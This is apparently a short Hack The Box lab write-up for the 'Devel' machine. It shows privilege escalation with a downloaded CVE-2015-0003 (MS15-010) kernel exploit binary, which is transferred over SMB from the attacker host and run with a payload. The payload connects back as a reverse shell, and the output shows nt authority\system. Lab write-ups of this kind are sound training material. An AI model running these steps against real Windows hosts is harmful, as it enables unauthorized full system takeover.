CVE-2015-0003(MS15-010)


It certainly matches the target operating system

i found this exploit online

┌──(kali㉿kali)-[~/…/htb/labs/devel/kernelbuster]
└─$ wget https://github.com/Ascotbe/Kernelhub/raw/master/CVE-2015-0003/CVE-2015-0003_x86.exe

I downloaded the file via wget

c:\tmp>copy \\10.10.14.6\smb\CVE-2015-0003_x86.exe
copy \\10.10.14.6\smb\CVE-2015-0003_x86.exe
        1 file(s) copied.

Transport over SMB

c:\tmp>CVE-2015-0003_x86.exe
CVE-2015-0003_x86.exe
HT Windows Font Exploit modify by skyer
usage: exp.exe "net user t00ls t00ls /ad"

Instruction seems easy enough

c:\tmp>CVE-2015-0003_x86.exe "C:\tmp\pe.exe"
cve-2015-0003_x86.exe "c:\tmp\pe.exe"

I supplied the payload as the command

┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\tmp>whoami
whoami
nt authority\system
 
c:\tmp>hostname
hostname
devel
 
c:\tmp>ipconfig
ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 3:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
   temporary ipv6 address. . . . . . : dead:beef::f1e5:9b02:27b6:d459
   link-local ipv6 address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
   ipv4 address. . . . . . . . . . . : 10.10.10.5
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2
 
tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

System Level Compromise